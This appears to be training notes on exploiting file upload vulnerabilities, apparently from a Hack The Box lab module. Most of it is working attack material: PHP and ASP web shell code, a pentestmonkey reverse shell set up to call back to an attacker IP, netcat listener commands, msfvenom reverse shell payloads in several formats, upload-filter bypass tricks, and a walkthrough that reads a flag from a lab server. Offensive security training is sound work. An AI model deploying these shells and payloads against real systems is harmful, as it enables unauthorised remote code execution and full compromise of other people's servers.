🎯 Core Technique: The final step in exploiting file upload vulnerabilities - deploying web shells and reverse shells for remote code execution
The final step in exploiting file upload vulnerabilities is to upload malicious scripts in the same language as the web application, such as web shells or reverse shell scripts. Once we upload our malicious script and visit its link, we can interact with it to take control over the back-end server.
🖥️ Interactive Control: Web-based command execution interfaces for compromised servers
We can find many excellent web shells online that provide useful features, like directory traversal or file transfer. One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell.
SecLists Web Shell Collection:
- Location:
/opt/useful/seclists/Web-Shells/ - Languages: PHP, ASP, ASPX, JSP, Perl, Python
- Features: Various functionality levels from basic to advanced
- Download appropriate web shell for target language (PHP, ASP.NET, etc.)
- Upload through vulnerable upload feature
- Navigate to uploaded file location
- Interact with the web shell interface
Example phpbash deployment:
# Upload phpbash.php through vulnerable upload form
# Access via: http://SERVER_IP:PORT/uploads/phpbash.phpExpected output:
www-data@target:/var/www/html/uploads$ whoami
www-data
www-data@target:/var/www/html/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)- Easy to use - Terminal-like interface
- File management - Upload/download capabilities
- Directory traversal - Navigate server filesystem
- Command execution - Run system commands
- Persistent access - Remains until removed
✍️ Manual Creation: Building simple but effective web shells when online tools aren't available
Basic PHP Web Shell:
<?php system($_REQUEST['cmd']); ?>Usage:
# Save as shell.php and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.php?cmd=idExample execution:
# URL: http://SERVER_IP:PORT/uploads/shell.php?cmd=id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)Improved version with better formatting:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>Basic .NET Web Shell:
<% eval request('cmd') %>Usage:
# Save as shell.aspx and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.aspx?cmd=whoami💡 Pro Tip: When using custom web shells in browsers, use source-view (Ctrl+U) to see command output as it would appear in terminal, without HTML rendering affecting the formatting.
🔄 Direct Connection: Establish reverse connection back to attacker machine for full interactive shell
Popular Reverse Shell Resources:
- Pentestmonkey PHP Reverse Shell - Reliable and feature-rich
- SecLists Reverse Shells - Multiple languages and frameworks
- RevShells.com - Online reverse shell generator
Step 1: Download and Configure
# Download pentestmonkey PHP reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
# Edit configuration (lines 49-50)
$ip = '10.10.14.55'; // CHANGE THIS - Your IP
$port = 4444; // CHANGE THIS - Your listening portStep 2: Start Netcat Listener
nc -lvnp 4444Step 3: Upload and Execute
# Upload php-reverse-shell.php through vulnerable upload form
# Navigate to: http://SERVER_IP:PORT/uploads/php-reverse-shell.php
# Reverse shell connection establishedExpected Connection:
kabaneridev@htb[/htb]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.55] from (UNKNOWN) [188.166.173.208] 35232
Linux target 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# whoami
www-data- Full interactive shell - Complete terminal functionality
- Better stability - More reliable than web shells
- Direct connection - No need for web interface
- File transfer capabilities - Easy upload/download
- Tunneling possibilities - Can tunnel other tools
🛠️ Automated Creation: Using msfvenom to generate custom reverse shell payloads
PHP Reverse Shell:
msfvenom -p php/reverse_php LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.phpJSP Reverse Shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.jspASPX Reverse Shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f aspx > reverse.aspxWAR Reverse Shell (Tomcat):
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f war > reverse.war- Bypass restrictions - May evade certain security filters
- Multiple formats - Various output formats available
- Custom encoding - Built-in evasion techniques
- Framework specific - Optimized for different web technologies
- Target:
94.237.49.23:52640 - Objective: Upload web shell and retrieve
/flag.txt - Technique: File upload exploitation
Step 1: Create Simple Web Shell
<?php system($_REQUEST['cmd']); ?>Step 2: Upload Web Shell
# Save as shell.php
# Upload through vulnerable upload form
# Note upload location (e.g., /uploads/)Step 3: Execute Commands
# Access: http://94.237.49.23:52640/uploads/shell.php?cmd=id
# Test command execution works
# Find flag: http://94.237.49.23:52640/uploads/shell.php?cmd=cat /flag.txtExpected Flag Format:
HTB{...}If basic upload fails:
- Try different extensions:
.phtml,.php3,.php4,.php5 - Modify Content-Type: Change to
image/jpegwhile keeping PHP content - Add magic bytes: Prepend
GIF89ato PHP code - Use reverse shell: Deploy pentestmonkey or msfvenom payload
This comprehensive approach to upload exploitation provides the foundation for compromising web applications through file upload vulnerabilities, leading to full server compromise through web shells or reverse shells.